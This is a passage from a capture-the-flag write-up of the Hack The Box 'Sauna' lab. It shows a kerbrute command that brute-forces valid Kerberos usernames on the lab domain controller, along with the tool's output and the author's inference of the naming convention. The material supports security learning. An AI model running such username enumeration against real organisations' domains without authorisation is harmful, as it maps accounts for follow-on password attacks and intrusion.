Kerberos
Nmap discovered a KDC service on the target port 88 and 464
While I do not know the naming convention that the target domain uses, I will attempt to enumerate usernames as much as possible by brute-forcing the KDC For efficiency, I will get that running in the background while enumerating other services
Username Extraction
┌──(kali㉿kali)-[~/archive/htb/labs/sauna]
└─$ kerbrute userenum --dc sauna.egotistical-bank.local -d EGOTISTICAL-BANK.LOCAL /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 03/25/23 - Ronnie Flathers @ropnop
2023/03/25 16:48:01 > Using KDC(s):
2023/03/25 16:48:01 > sauna.egotistical-bank.local:88
2023/03/25 16:48:06 > [+] VALID USERNAME: administrator@EGOTISTICAL-BANK.LOCAL
2023/03/25 16:48:35 > [+] VALID USERNAME: hsmith@EGOTISTICAL-BANK.LOCAL
2023/03/25 16:48:40 > [+] VALID USERNAME: Administrator@EGOTISTICAL-BANK.LOCAL
2023/03/25 16:48:56 > [+] VALID USERNAME: fsmith@EGOTISTICAL-BANK.LOCAL
2023/03/25 16:51:31 > [+] VALID USERNAME: Fsmith@EGOTISTICAL-BANK.LOCALI had kerbrute running in the background for a while now.
It was able to extract 2 valid domain user; hsmith and fsmith
This also suggests that the organization uses a naming convention of the first letter of FIRSTNAME followed by LASTNAME